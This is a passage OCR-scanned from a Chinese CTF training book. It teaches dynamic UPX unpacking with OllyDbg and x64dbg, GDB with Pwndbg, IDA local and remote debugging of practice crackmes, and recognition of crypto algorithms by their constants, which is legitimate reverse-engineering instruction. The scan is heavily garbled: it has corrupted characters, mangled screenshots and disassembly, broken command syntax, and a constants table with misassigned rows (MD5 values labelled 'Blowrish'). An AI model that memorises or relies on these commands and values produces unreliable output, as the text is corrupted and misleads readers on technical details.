动态 方法 : 虽然 UPX 本 身 可 以 脱 壳 ， 但 是 UPX 是 基于 加 壳 后 可 执行 文件 内 存储 的 标识 来 查找 并 操作 
的 ， 由 于 UPX 是 开源 的 ， 软 件 保 护 者 可 以 任意 修改 这 些 标识 ， 从 而 导致 官方 标准 版 本 的 UPX 脱 壳 失 
败 。 因 为 UPX 中 可 以 改动 的 地 方太 多 ， 所 以 人 们 在 这 种 情况 下 一 般 采 用 动态 脱 壳 。 


由 于 静态 脱 壳 较为 简单 ， 不 需 更 多 讲解 ， 下 面 继续 讲解 动态 脱 壳 方法 。 


可 执行 文件 被 操作 系统 载 入 后 开始 执行 前 ,寄存 器 内 会 存放 一 些 操作 系统 预先 填充 好 的 值 ， 栈 的 数据 
也 会 被 设置 ， 膏 程序 要 保留 这 些 数 据 (状态 ) ， 以 免 其 被 壳 段 代码 不 经 意 间 地 破坏 ， 在 转 区 控制 权 前 
壳 需 要 恢复 这 些 数据 ， 才 能 让 原来 的 程序 正 划 运行 。 


一 般 情况 下 ， 由 于 已 有 栈 的 内 容 是 不 应 更 改 的 ， 简 单 的 这 会 选择 将 这 样 的 信息 压 入 栈 (在 栈 上 开辟 新 
的 空间 ) ，x86 的 汇编 指令 pushad 可 以 轻松 地 将 所 有 寄存 器 一 次 性 压 入 栈 ，UPX 也 使 用 了 这 样 的 方 
式 ， 被 形象 地 称 为 “保护 现场 ”。 载 入 后 可 以 发 现 ， 程 序 的 最 开始 为 pushad 指 令 ， 见 图 5-3-1。 如 果 
pushad 执 行 后 ， 在 栈 项 下 硬件 读 取 断 点 ， 那 么 当 程 序 执行 完 后 续 的 还 原 代码 操作 ， 使 用 popad 指 令 
恢复 寄存 器 时 融会 中 断 。 
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图 5-3-1 
于 是 ， 先 单 步 执行 pushad 指 令 ( 按 F8 键 ) ， 再 设置 硬件 读 取 断 点 。 在 OllyDBGC 中 ， 右 击 寄 人 存 器 区 
域 ， 在 弹出 的 快捷 菜单 中 选择 “HW break [ESP]” 即 可 。x64DBG 则 可 直接 在 栈 窗 口中 利用 右键 快 
捷 荣 单 设置 。 


设置 完成 ， 按 F9 键 运行 程序 ， 再 次 中 断 在 一 个 不 同 的 地 址 ， 见 图 ?5-3-2。 





图 >-3-2 
实际 上 ， 这 是 一 个 将 栈 空 间 向 上 清 零 0x80 长 度 的 循环 ， 并 不 是 真实 的 程序 代码 ， 后 面 紧 跟 一 个 向 前 的 
较 远 的 跳 转 (从 0x43208C 跳 到 0x404DDC) ， 这 样 即 跳 到 原 代码 的 跳 转 〈 壳 程序 一 般 与 程序 原来 的 
代码 企 不 同 的 区 段 ， 故 相隔 较 远 ) 。 


现在 ,硬件 断 点 已 经 完成 了 使 命 ， 我 们 要 删除 挥 它 ， 以 防止 后 续 触 友 。 在 OD 的 菜单 栏 选择 “调试 一 
硬件 断 点 ”， 列 出 所 有 的 硬件 断 点 ， 见 图 ?-3-3， 删 除 即 可 。 


图 5-3-3 
将 光标 移 至 最 后 的 mp， 按 F4 键 ,使 得 程序 执行 到 光标 处 ， 表 按 F8 键 执行 跳 转 。 此 时 出 现 了 正常 的 函 
数 开 头 和 结尾 ， 见 图 5-3-4 和 图 5-3-5， 所 以 有 理由 相信 此 时 的 代码 片段 属于 原 程序 。 
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0012FFCh 医 IEETITIII BaleE: 








图 5-3-5 
这 时 可 以 对 程序 进行 Dump。 在 OD 中 选择 “插件 一 OllyjDump 一 脱 壳 正 在 调试 的 进程 ”菜单 命令 ， 
在 弹出 的 对 话 框 中 指定 脱 壳 参数 ， 见 图 5-3-6。 


Dll7puoanp 一 3-UPAX packed. exe 


起 始 地 址 : 大 小 : aoo0 
入 口 点 地 址 : lz -> 修正 为 : [anrc 获 职 EIP 作 为 DEP | 职 消 | 
代码 基 址 : |180o0 数据 基 址 : [33000 


I 在 脱 壳 镜像 中 修正 物理 地 址 和 物理 大 小 
Sec... | Virtual... | Virtual... | Raw Size | Ray Dffset | Charactaristi, 


UF#D 00018000 O0001000 00018000 D0001000 EDDOONNS80 
UFX1 D001A000 O0019000 O001A000 00019000 EDDOOO40 
.rsre Qn01000 00033000 00001000 00033000 CONO0040 


|[Y 重建 输入 表 
从 方式 1 : 在 内 存 镜 创 中 搜索 JWP[AFI] | CALL[AFI] 
个 方式 2 : 在 脱 壳 女 件 中 搜索 DLL & hPI 名称 


这 流 化 :dyk158 105 04 21] 
图 5-3-6 
单 击 “获取 EIP 作 为 OEP” 按 钮 ， 表 单 击 “ 脱 这” 按钮， 保存 后 即 可 完成 脱 壳 。 


EY EE USN UEES 
20) 


Eile Edit Junp Seorch Yiew Debugqer Luninoe Qptions Windous HeLp 
甘 回 所" 叶 ” 风向 物 竹 员 固 @ 础 晴 团 党 "天 欧 XP 加 口 No debusser 物 团 | 加 他 们 
: 喔 于 NN 


» 
Library function 图 Regular function 国 Instruction BM Data 国 Unexplored WD) External symbol 国 Lumina function 
DFunctions window oa 作 IDA View-A 品 如 Hex View-! 
Function none Segn ^ pe 
Fstd:: ‘dynomic initializer for “fout (void) Wpx0 | 和 ; 
Fsub_401059 UpX8 ee 

401079 p 上 
一 eight ei UPXx@:99461898 ; int _cdecl main(int argc, const char **argv, const 

PXe:66461898 _main proc near ; CODE XREF: 
If|sub_80109B Upx0 pxe:68461898 
了 jsub-4019h7 UpX8 pxe:86461896 argc = dword ptr 4 
sub-461663 EXO Upxe:6e461896 argv = dword ptr 8 

UpX8 Upxe:69491898 envp = dword ptr ech 

sub_401120 Upx0 Upxe:696461899 
了 | Sub_491158 Upx8 “UPX6:66461899 call sub_461A38 
月 sob_401160 Upxo .Upxe:88461895 
用 unknoon_Uibnone_l Upxg "UPx6:66461897 
下 |std::error_cotegoryi :defaut_error_condition… UPX0 Upxe:89461897 本 
刀 sub_46110 Upx0 UPxe:66461897 
了 |]sub_461219 UpXb PX8:688491897 ; 
Fsub_401240 Upxb “UPX6:86461898 align 19h 
| 地 | Sub_401280 Upx0 
If|sub_401530 Upx0 下 ; SUBROUTINE 
fF|sub_801560 Upxg 


fsub_401570 a Upxe:ee4el8A8 sub_4618A9 proc near ; CODE XREF: 
Fsub_a015F0 Upxg Upxe: e04018A0 ; sub_491288- 
媚 sub_461610 UpX8 "UPXx6:664618A6 esi 

于 | Sub_401650 Upx0 “UPXe:864618A1 @S ecx 

媚 sub_401760 UpX8 "UPxe:664618A3 ecx, [esi+14h] 

用 sub_401786 Upxg “Upxe:684618A6 ecx，19h 

Upx0 1 short loc 4618D2 


Upxe:884618A9 


UpX6 * UPXO :606049018AB eax, [esi] 

UpX6 “UPX6:664618AD ecx 

Upxg “UPX6 :86046018AE ecx, 18686h 

Upx0 “UPX6 :60664618B4 short loc 4018C8 
Upxg “UPX9:664618B6 edx，[eax-4] 
Upxb “UPX6:964618B9 ecX，23h ; “ 提 ” 
Upxg “Upxe:664618BC eax, edx 

Do “Upxe:884618BE eax, OFFFFFFFCh 
i "UPxe:664618C1 eax, 1Fh 


至 此 ， 


注意 : 除了 最 后 一 步 IDA 的 使 用 ， 其 余 操 作 请 在 Windows XP 系 统 下 完成 。 这 是 因为 : 
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学 Windows XP 后 的 系统 中 市 有 ASLR (地 址 空间 随机 化 ) ， 程 序 每 次 局 动 需要 重 定位 (将 地 
址 引用 修复 到 正确 的 位 置 ) 才 可 以 正音 运行 ， 而 恢复 重 定 位 信息 难度 较 遍 。 


必 从 Windows Vista 开 始 ，NT 内 核 开 始 引 入 MinWin， 出 现 了 大 量 的 api-ms-XXXXXX 的 | 
， 这 导致 了 相当 一 部 分 依赖 于 NT 内 核 特征 的 工具 出 现 问 题 ， 如 在 Dump 时 使 用 OllyDump 的 
导入 表 搜 索 会 受 此 影响 。 


学 从 Windows 10 开 始 ， 部 分 API 有 所 更 改 ， 导 致 OollyDump 的 基 址 无 法 被 正确 填 入 。 


x64DBG 解 决 了 其 中 除 重 定位 以 外 的 问题 ， 硬 件 断 点 可 以 在 断 点 页 面 进 行 删除 ， 对 应 的 脱 壳 工具 通过 
上 


Fiue Imports Trace Misc Help 


Attach to an active process 


Show Invalid ~ Show Suspect 


IAT Info 


Module parsing: C'\Windows\SysWOW64\msvcp140.dll 
Loading modules done. 


Inports: 9 vInvalid: 8 Inogebose: 00270000 3-UPX_packed.exe 
图 ?5-3-9 

单 击 “IAT Autosearch” 按 钮 ， 再 单 击 “Get Imports” 按 钮 ， 在 “Imports” 中 选中 有 红 叉 的 ， 按 

Delete 键 删除 。 然 后 单 击 “Dump” 按 钮 ， 将 内 存 转 为 可 执行 文件 ， 单 击 “Fix Dump” 按 钮 ， 将 导 

入 表 修 复 ， 完 成 修复 ， 并 在 IDA 中 加 载 。 


这 样 生 成 的 程序 虽然 可 以 在 IDA 中 分 析 ， 但 是 并 不 能 运行 ， 因 为 程序 的 重 定位 信息 并 没有 人 锌 修复 。 其 


实 并 不 一 定 需要 修复 重 定位 的 信息 ， 可 以 通过 CFF Explorer 等 工具 修改 Nt Header 的 i 
aracteristics 
”,， 勾 选 “Relocation info stripped from file” ， 见 图 5-3-10， 可 阻止 系统 对 这 个 程序 进行 


ES Ea ES 


[| File is executable 


tripped from file 
LL | Agressively trim working set 
[_] App can handle »>2gb address space 
L_| Bytes of machine word are reversed (low) 
[2] 32 bit word machine 
L_| Debugging info stripped from file in ,DBG file 
L_| IfImage is on removable media, copy and run 和 om the swar 
L_| If Image is on Net, copy and run from the swap file 
[] File should only be run on a UP machine 


“< 


图 5-3-10 
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和 hello or | 
3 


5.3.3 GDB 调 试 
在 Linux 系 统 ， 人 们 一 般 使 用 GDB 进 行 调试 ， 本 证 简要 介绍 GDB 环 境 的 配置 及 应 用 。 
1. GDB 环 境 配置 


原始 的 GDB 非 常 难以 使 用 ， 每 次 执行 完 查看 反 汇编 、 内 存 、 栈 、 寄 存 器 等 信息 时 ， 需 要 手动 答 入 命 

令 ， 没 有 图 形 化 界面 汪 导 到 不 够 直观 、 方 便 。 因 此 ， 各 种 GDB 的 插件 应 运 而 生 , 如 Gef、peda、，、 
AAA 

等 。 本 节 介 绍 pPwndbg， 因 为 它 与 IDA 的 整合 更 加 优秀 。 : 


Aale oe |s SE =P] Ses lle sau /el eRe d/le lole /oN /ale loTe Ps =i so A 
中 可 看 到 安装 说 明 。 安 装 后 ， 每 次 启动 GDB 时 都 会 自动 加 载 Pwndbg 插 件 。 


2. 打开 文件 
GDB 打 开 文 件 的 方式 与 图 形 化 的 工具 不 同 ， 需 要 通过 传 入 参数 或 执行 命令 。 


方式 1: 在 GDB 的 命令 行 后 直接 接 可 执行 文件 ， 形 如 “gdb./2-simpleCrackme” 
的 程序 ) 。 


方式 2: 使 用 GDB 的 --args 参 数 执行 ， 形 如 “gdb--args./ping-c 10 127.0.0.1”，。 
方式 3: 打开 GDB 后 ， 使 用 file 命 令 指 定 可 执行 文件 。 
3 . 调试 程序 
GDB 的 调试 方式 也 与 图 形 化 的 工具 不 同 ， 完 全 由 命令 控制 ， 而 不 是 快捷 键 。 
(1) 控制 程序 执行 
学 Fr (run) : 启动 程序 。 
学 5 (continue) : 让 暂停 的 程序 继续 执行 。 
他 si (step instruction) : 汇编 指令 层面 上 的 单 步 步 入 。 
必 ni (next instruction) : 汇编 层面 上 的 单 步 步 过 。 
学 finish: 执行 到 当前 函数 返回 。 
(2) 查看 内 存 、 表 达 式 等 


学 X/dddFFF: ddd 代 表 长 度 ，FFF 代 表格 式 ， 如 “x/10gx”， 具 体格 式 列表 可 以 查看 http:// 


ME Elle [leloKelel jhe lolol ta Ad lk ll 


光 p (print) : 输出 一 个 表达 式 的 值 , 如 “p 1+1”，p 命 令 同 样 可 以 在 后 面 添加 指定 格式 ， 
wo BD/X 111222 


(3) 断 点 相关 命令 


学 b (break) : bxlocation，location 可 以 为 十 入 进 制 数 、 名 称 等 ， 如 “bx*0x8005a0” “b 
*main”。 “*” 是 指 中 断 在 指定 的 地 址 ， 而 不 是 对 应 的 源 代码 行 。 
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必 info b 或 info bl (Pwndbg 加 入 ) : 列 出 所 有 上 断 点 ， 每 个 断 点 会 有 自己 的 序号 。 
学 del (delete) : 删除 所 定 序号 的 断 点 ， 如 “del 1”。 
学 clear: 删除 揭 定 位 置 的 断 点 ， 如 “clear*main 
(4) 修改 数据 
必 修改 寄存 器 : set$rax=0x100000。 
* 修改 内 存 : set{ 要 赋值 的 类 型 } 地 址 = 值 ， 形 如 “setfintjOx405000=0x12345”。 


注意 ，GDB 不 会 在 入 口 点 处 暂停 程序 ， 故 用 户 需要 企 程序 执行 前 设置 好 上 自己 的 断 点 。 此 外 ，GDB 不 像 
OD 和 x64DBG 一 样 目 动 保存 用 户 的 断 点 数据 ， 需 要 用 户 每 次 重新 设置 断 点 。 


在 GDB 的 命令 行 中 ， 无 输入 直接 回 车 代表 重复 上 一 条 命令 。 
4. 1IDA 整 合 


Pwndbg 提 供 了 IDA 的 整合 脚本 ， 只 需 在 IDA 中 运行 Pwndbg 目 录 的 ida_script.py， 然后 IDA 会 监听 
t 


t 
://127.0.0.1:31337， 本 机 Pwndbg 链 接 到 IDA 上 ， 并 使 用 IDA 的 各 种 功能 。 i 


考虑 到 很 多 人 在 Windows 上 使 用 IDA 同 时 在 Linux 虚 拟 机 上 使 用 Pwndbg， 所 以 要 修改 脚本 ,把 脚本 
中 的 127.0.0.1 改 为 0.0.0.0 来 允许 虚拟 机 连接 。 然 后 在 GDB 中 执行 “config 人 
”， 重 局 GDB 即 可 生效 ， 见 图 ?-3-12。 


图 ?5-3-12 
结合 上 面 介 绍 的 命令 ， 让 程序 在 main() 阔 数 起 始 位 置 断 下 来 ， 则 需 执行 “b*main” 合 令 ， 然 后 可 执 
行 [命令 运行 程序 。 
在 程序 中 断 时 ，Pwndbg 会 目 动 显示 当前 的 反 汇 编 、 寄 仔 器 值 、 枝 内 容 等 程序 状态 ， 开 局 IDA 集 成 时 
会 显示 对 应 的 有 反 编译 的 伪 代 码 ， 在 IDA 中 高 亮 并 定位 到 对 应 地 址 ， 见 图 5-3-13。 


/Dll = EE 
的 偏 移 量 。 例 如 ， 图 5-3-14 所 示 的 main 的 地 址 在 IDA 中 本 来 为 0x7aa， 而 获取 的 地 址 为 重 定位 后 的 0x 
5555555547aa。 


5.3.4 IDA 调 试 器 
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上 面 介 绍 的 局 限于 一 种 平台 ， 而 且 各 有 自己 的 一 套 操 作 方法 。 这 无 疑 加 大 了 学 习 成 本 。 而 且 它 们 的 代 
码 分 析 能 力 都 远 远 弱 于 IDA。 有 没有 一 种 既 能 用 上 IDA 和 HexRays 强 大 的 分 析 能 力 ， 又 能 对 2 
indows 
、Linux 甚 至 座 入 式 、Android 平 台 调 试 的 工具 呢 ? 


答案 显然 是 “有 ”。1DA 从 很 早 开 始 束 内 建 了 调试 器 ， 并 且 5 妙 地 利用 前 后 端 分 离 的 模块 化 设计 ， 可 
以 使 用 WinDbg、GDB、QEMU、Bochs 等 已 有 的 调试 工具 ， 而 IDA 本 身 也 有 专用 的 远程 调试 后 端 。 


i 和 


图 5-3-14 
随 着 友 展 ，HexRays 也 加 入 了 调试 功能 ， 可 以 对 反 编译 的 伪 代 码 进行 调试 ， 并 查看 变量 ， 获 得 如 源 代 
码 调试 般 的 体验 。 


下 面 介绍 IDA 的 部 分 调试 后 端 和 操作 方法 。 
1. 选择 IDA 调 试 后 端 
在 项 部 有 一 个 下 拉 菜 单 ， 即 选择 调试 器 后 端的 位 置 。 


很 多 用 户 实际 上 使 用 的 是 Windows 版 本 的 IDA， 该 IDA 可 以 直接 调试 Windows 下 32bi 证 64bit 的 程 
序 。Linux 下 的 程序 则 需要 使 用 远程 的 调试 器 ， 见 图 5-3-15 和 图 5-3-16 所 示 。 


No debugger 

No debugger 

Local Bochs debugger 
Local Windows debugger 
PIN tracer 

Remote GDB debugger 
Remote Windows debugger 
Trace replayer 


FIN tracer 
Remote SIE debugEer 
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Remote Limys: debuzgger 
Trace repl aver 
5-3-16 
下 面 分 别 介绍 调试 器 的 使 用 方法 和 远程 调试 的 方法 。 
2. 本 地 调试 启动 方法 
本 节 内 容 在 Windows 版 本 的 IDA 中 操作 ， 配 套 文件 为 4-debugme。 


载 入 IDA 后 ， 程 序 实际 上 在 对 程序 内 置 的 一 个 字符 串 进行 变种 base64 和 解码。 考虑 到 运行 过 程 中 会 直接 
生成 所 需 的 明文 ， 所 以 使 用 调试 直接 抓 取 最 终 的 解码 结果 会 更 加 便捷 。 


<1> 选 择 后 端 。 选 择 调 试 器 后 端 为 Local Windows debugger， 即 可 使 用 IDA 内 置 的 调试 器 。 


<2> 开 始 调试 。1IDA 调 试 与 DD 和 x64DBG 的 快捷 键 基本 一 致 ， 要 启动 程序 只 需要 按 F9 即 可 。 单 击 相应 
工具 栏 的 绿色 的 三 角形 也 可 以 启动 程序 。 在 启动 调试 前 ，1DA 会 弹出 一 个 确认 对 话 框 ， 单 击 “Yes” 按 
钮 ， 即 可 开始 调试 。 


<3> 委 调试 文件 默认 的 路 径 为 输入 文件 的 路 径 ， 知 目标 文件 不 仔 企 ， 或 因 其 他 原因 加 载 失 败 ，IDA 均 
会 弹出 警告 对 话 框 ， 确 认 后 会 进入 Debug application setup 设 置 的 对 话 框 ， 见 图 5-3-17。 (如 有 需 
要 ， 也 可 以 利用 “Debugger 一 Process options′ 菜单 命令 进入 。 ) 


Application 


JInput file 





Directory 


paraneters [ 
Hostnane [5 Jpat [23946 ~ 
Passuord [ 


[Lj Save network settings as default 


图 5-3-17 
设置 后 单 击 “OK” 按 钮 ，IDA 重 新 尝试 启动 程 序 ， 若 放 痉 调试 ， 则 单 击 “Cancel” 按 钮 。 


[DN = DN a 


注意 ，IDA 7.0 的 32 位 本 地 调试 似乎 有 已 知 bug ， 会 触 友 Internal Error 1491。 知 需 调 试 32 位 


WAVATele [es 


程序 ， 则 可 使 用 IDA 6.8 或 其 他 版 本 。 
3. 断 点 设置 
IDA 的 断 点 可 以 通过 快捷 键 F2 设 置 ， 也 可 以 在 图 形 化 界面 中 单 击 左 侧 小 蓝 点 设置 。 在 切换 为 断 点 后 ， 
对 应 行 的 底 色 将 会 变 成 红色 以 突出 显示 。 


同时 ，IDA 支 持 使 用 反 编 译 的 伪 代 码 进行 调试 ， 同 样 支持 对 肥 编 译 后 的 伪 代 码 行 下 断后 。 伪 代码 窗口 
中 行 号 左 人 出 有 蓝 色 的 圆 点 ， 这 些 圆 点 与 反 汇 编 窗 口 左 侧 监 色 的 小 点 功能 一 样 ， 都 是 用 来 切换 断 点 的 状 
态 的 。 单 击 这 些 监 色 圆 点 ， 伪 代码 的 对 应 行将 类 似 反 汇编 窗口 中 的 断 点 ， 变 为 红色 底 色 。 
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通过 debugme,， 在 main 函 效 上 设置 断 点 ， 见 图 5-3-18， 然 后 运行 程序 ， 进 行 伪 代码 调试 。 运 行 后 ， 


程序 目 动 中 断 ， 并 目 动 打开 伪 代 码 窗口 。 奋 没有 打开 伪 代 码 窗口 ， 单 击 菜单 栏 的 及 > 2 即 可 切 


换 到 伪 代 码 窗口 。 在 伪 代 码 窗口 中 ， 将 被 执行 的 代码 行 会 被 高 之 ， 见 图 5-3-19。 


char *ve; // esi 

signed int result; // eax 

char v2 ecx 

char *v3; // eax 

bool v4: J/ et 

unsigned _ int8 v5; // dl 

const char *v6; // ecx 

int outlen; // [esp+4h] [ebp-188h] 

char input[256]; // [esp+8h] [ebp-184h] 
DELMEf CC Ne 
memset(input，6，6x166u ) ; 

scanf("%s", input); 

outlen = 6; 

ve = base64 decode(6x24u， (const char *)&outlen); 
if (ve) 


if ( strlen(input) == outlen ) 


图 5-3-18 


memset 8B(Dst, 8, Bx188ui64); 
scanf("%s", Dst); 
v3 = 0; 

图 5-3-19 


< 


在 中 断后 ， 选 择 “Debugger 一 Debugger windows 一 Locals” 荣 单 命令 ,打开 查 看 局 部 变量 的 窗 
国 | 1 见 图 5-3-20。 


默认 情况 下 ，Locals 窗 口 与 伪 代 码 窗口 一 起 显示 ， 见 图 ?-3-21， 可 以 将 其 抱 至 侧 边 ， 以 便 与 伪 代 码 并 
排查 看 ， 见 图 ?-3-22。 


单 步 执行 程序 至 scanf， 会 发 现 程 序 进入 运行 状态 ， 此 时 程序 在 等 待 用 户 输入 ， 随 意 输入 一 些 内 容 后 
按 回 车 ， 程 序 即 再 次 中 断 。 此 时 Locals 窗 口中 的 Dst 变 量 显示 刚才 输入 的 值 (本 次 为 aab) ， 见 图 5-3- 
23。 红 色 代 表 这 些 变量 的 值 被 修改 过 (与 Visual Studio 的 行为 相同 ) 。 


View | Debugger | 0ptions QWindows Heup 


ugger 中 Bi Quick debug vieo Ctrb+2 | 6 中 eo : 导 | 罩 3 Ee 


Breakpoints 


如 6eneral registers 
对 Segment registers 
Watches 对 FPU registers 
Tracina 对 HHX registers 
Continue process 对 Xxhh registers 
Attach to process... 这 Debugger windou CtrL+ALt+C 
process options... Ihreod List 
pause process Hodule List 


Terminate process CtrlfF2 性 
Stack vieo 


Es Stack trace CtrL+ALt+S 
Watch vieo 


Detach from process 
Refresh memory 
Toke memory snopshot 


Step into F7 

2 Step over F8 
Run untiu return Ctru+F7? 
Run to cursor Fu 


] Switch to source 
Use source-Level debugging 
0pen source file... 


Debuoger options... 
Switch debugger... 


图 ?5-3-20 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


v 9x10C7?9h806164 

i 
v Ox2Z8AIDC80500168: 0x60 
Ox86830C0B160 


0x039486836C08164 
0x039486836508164 
9x28h105?9R00164 


1168 
Ox28AIDC7G80016¢ 
WO 





图 5-3-23 
继续 执行 程序 至 base64 decode 后 ， 可 以 看 到 v5 已 经 被 修改 成 另 一 个 值 ， 见 图 ?5-3-24。 但 是 实际 上 Yv 
5 为 一 个 字符 串 ， 存 放 着 正确 输入 。 那 么 ,该 怎样 获取 v5 的 内 容 呢 ? 


Db:\TTeachingiorkspace\4~debugne. exe 
CIWTIIDOYSVSYSTBI32Vveruntine140, dll 
apphelp, dl 








9168 
9xe9C140F6C2F0006168 
_9x175659C8RD01683:9x664 


图 5-3-24 
查看 v5 的 内 容 有 两 种 方案 。 


Q@ 在 Locals 窗 口 的 Location 栏 中 可 以 看 到 v5 的 位 置 为 RDI， 在 寄存 器 窗口 可 以 看 到 RDI 的 值 ， 单 击 其 
值 右 侧 的 按钮 ， 即 可 在 反 汇编 窗口 中 跳 转 到 对 应 的 位 置 ， 见 图 5-3-25。 


RDI B8888175658CBADG [b] debug812:88888175658CBADG 
RRP 他 人 全 全 全 RR 必 


图 5-3-25 


可 以 看 到 flag 丈 在 眼前 ， 见 图 5-3-26。 继 续 使 用 之 前 所 讲述 的 数据 类 型 变换 操作 ， 按 a 键 将 其 转 为 字 
符 串 显示 ， 见 图 5-3-27。 


Q@ 修 改 v5 的 类 型 ， 从 _BYTE* 修 改 为 char*， 此 时 HexRays 会 认为 v5 是 一 个 字符 串 ， 从 而 将 其 在 Locals 
显示 出 来 。 具 体操 作为 : 在 伪 代 码 窗口 中 按 Y 键 ， 修 改 v5 类 型 为 char 并 确认 ， 然 后 在 Locals 窗 口中 右 
键 单 击 Refresh 刷 新 ， 结 果 见 图 ?5-3-28。 


人 至此， 我们 成 功 地 利用 调试 找到 了 内 存 中 的 flag。 注 意 ，IDA 中 的 变量 与 C 语 言 中 变量 的 行为 并 不 完全 
一 致 ，IDA 中 的 变量 有 特殊 的 生命 周期 ， 尤 其 是 寄 仔 器 中 的 变量 ， 在 超出 一 定 学 围 后 ， 其 值 会 收 履 兰 
成 其 他 变量 的 值 ， 这 是 无 法 避免 的 。 所 以 ，Locals 中 变量 的 值 在 远离 被 引用 位 置 时 并 不 可 靠 。 请 仅 在 
该 变量 被 引 用 时 或 明确 知道 该 变量 生存 周期 时 骨 相 信 Locals 显 示 的 值 。 
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ebug812:88888175658CBADD db 
ebug912:0996969175656CBADE db ~ | 
ebug812:888881755658CBADF db 

debug812:88888175658CBAE8 db 

debug812:88888175658CBAE1 db 
ebug812:880888175658CBAE2 db 
ebug812:88888175658CBAE3 db 
ebug812:88888175658CBAE4 db 
ebug812:88888175658CBAES5 db 
ebug812:886888175658CBAE6 db 
ebug812:886888175658CBAE7 db 
ebug812:88888175658CBAE8 db 
ebug812:88888175658CBAE9 db 
debug812:88888175658CBAEA db 


图 ?5-3-26 


ebug612:68666175656CBACE db 9 
[RE |debug612:696696175656CBACF db 3Fh ; ? 
Hy ldebuge12:880091756586CBAD@ aFlagDebugWillB db 'flag{Debug_wil1_be_easier}',9 
| ebug812:68666175656CBAEB db 8ABh 

ebug612:666661756569CBAEC db 9ABh 


图 5-3-27 


CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


ws 


We ws We we We We We We Woe We 


sw 本 mhmg ml 


ve OxdaC laDFOC2FOOOOT6d 
由 v5 Ox175650CBADOT64: "flag{Debug_oill_be_eosier}" Char 文 
result Ox65OCBADOT OY int 
v7 DxIl75650CBADOTON signed __int6d 


图 5-3-28 
5 .远程 调试 配置 方法 


本 节 使 用 IDA 7.0 Windows 版 ， 配 套 文 件 为 2-simpleCrackme。 


本 节 详 细 讲 解 远程 调试 工具 的 使 用 方法 。 远 程 调试 与 本 地 调试 相似 ， 只 不 过 要 调试 的 可 执行 文件 运行 
在 远程 计算 机 上 ， 需 要 在 远程 计算 机 上 运行 IDA 的 远程 调试 服务 器 。1IDA 的 远程 调试 服务 器 位 于 IDA 安 
技 目 录 的 dbgsrv 目 录 下 ， 见 图 5-3-29。 


IDA 提 供 了 从 主流 桌面 系统 Windows、Linux、Mac 到 移动 端 Android 系 统 的 调试 服务 器 ， 用 户 根据 
系统 和 可 执行 文件 架构 选择 对 应 的 服务 器 。 


在 Linux 下 的 x86-64 架 构 程序 ， 故 应 选择 linux _ server64 调 试 服务 器 。 
在 Linux 虚 拟 机 中 运行 调试 服务 器 ， 不 市 参数 运行 时 ， 调 试 服务 器 将 自动 监听 0.0.0.0:23946。 


2-simpleCrackme 文 件 是 运行 


在 IDA 中 选择 调试 后 新 为 Remote Linux debugger， 然 后 设置 Process options。 所 有 路 径 必 须 是 远 
程 主机 上 的 路 径 ， 如 这 里 将 被 调试 的 可 执行 文件 放 在 /tmp 目 录 下 ， 虚 拟 机 的 地 址 为 linux- i 
workspace 
( 见 图 5-3-30) 。 设 置 好 参数 ， 单 击 “OK ”按钮 保 仓 。 


了 上 术 》main09 (C:) > Program Fiues > IDA 7.0 > dbgsrv 


A 


名 称 修改 日 期 类 型 


2017-09-14 15: 文件 
2017-09-14 15: 文件 


| android_server 
| android_server_nonpie 


| android_server6d 


| androi1d_x64_server 


| ondroid_x86_server 


| ormLinux_server 


] ormuclLinux_server 
日 ido_kdstub.dll 
| Linux_server 


Linux_serverbd 


| Mac_server 


| mac_serverbl 


a 
和 


Win32_remote.exe 
win64_renote64 .exe 


2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 
2017-09-14 


文件 
文件 
文件 
文件 
文件 

应 用 程序 术 展 
文件 
文件 
文件 
文件 

应 用 程序 
应 用 程序 


2017-09-14 
2017-09-14 


应 用 程序 术 展 
应 用 程序 


» wince_remote_orm.dll 
a wince_remote_tcp_arm.exe 


图 5=3-29 


NOTE: all paths must be valid on the remote computer 


Application | /tmp/simpleCrackme v 攻守 


Input file [en ada Tal wz 
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Er gE 


peeer 
teams [EGR re 
rd 


[ | Save network settings as default 


图 ?-3-30 
接 下 来 的 所 有 流程 与 本 地 调试 基本 一 致 ，IDA 在 加 载 文件 时 会 弹出 提示 框 ( 见 图 5-3-31) ， 等 待 用 户 
确认 访问 远程 文件 ， 单 击 “Yes” 按 和 


区 please be caoreful, the debug path Looks odd! 
“ /tmp/sinmpLeCrackme 
Do Vou reauuy want IDA to access this path (possibly a remote Server)9 


图 5-3-31 
IDA 成 功 设置 断 点 ， 可 以 目 由 调试 ， 见 图 ?-3-32。 位 于 远程 的 服务 器 同样 将 显 ， 见 图 5-3-33， 
据 此 可 以 判断 IDA 是 否 成 功 连接 到 了 远程 主机 。 


图 5-3-32 


图 本 333 


注意 ， 通 过 远程 调试 运行 的 程序 与 服务 器 程序 共用 一 个 控制 台 ， 直 接 在 服务 器 端 输入 即 可 与 被 调试 程 
Ed 


Windows 的 远程 调试 服务 器 使 用 方法 类 似 ， 在 此 不 再 次 述 ， 请 读者 目 行 操作 。 


https://weread.qq.com/web/reader/77d32500721a485577d8eeek1c3321802231c383cd30bb3 





2021/1/16 从 0 到 1: CTFer 成 长 之 路 -Nu1L 战 队 - 微 信 读 书 


5.4 弟 见 算 ; 去 识别 


住 CTF 的 六 向 工程 题目 中 ， 某 些 成 熟 的 算法 出 现 频 率 非 常 高 ， 如 果 能 识别 出 这 些 算法 ， 必 然 能 够 大 大 
提高 进行 逆向 工程 的 效率 。 本 书 介绍 常见 的 算法 识别 拉 15。 


5.4.1 特征 值 识 别 


很 多 常见 算法 ， 如 AES、DES 和 等， 在 运算 过 程 中 会 使 用 一 些 常 量 ， 而 为 了 提高 运算 的 效率 ， 这 些 常量 
往往 被 硬 编码 在 程序 中 。 通 过 识别 这 些 特征 弟 量 ， 可 以 对 算法 进行 一 个 大 致 的 快速 判断 。 表 5-4-1 
弟 见 算法 需要 使 用 的 弟 量 。 


算 法 特征 值 ( 如 无 特殊 说 明 为 十 六 进 制 ) 
TEA 系列 
52 09 6a d5 30 36 a5 38 … 
3a 32 2a 22 1a 12 0a 02 … 
39 31 29 21 19 11 09 01 … 
0e 11 0b 18 01 05 03 lc … 
Blowrish 
67452301 efcdab89 98badcfe 10325476 
SHA1 67452301 efcdab89 98badcfe 10325476 c3d2e1f0 
CRC32 CRC 才 


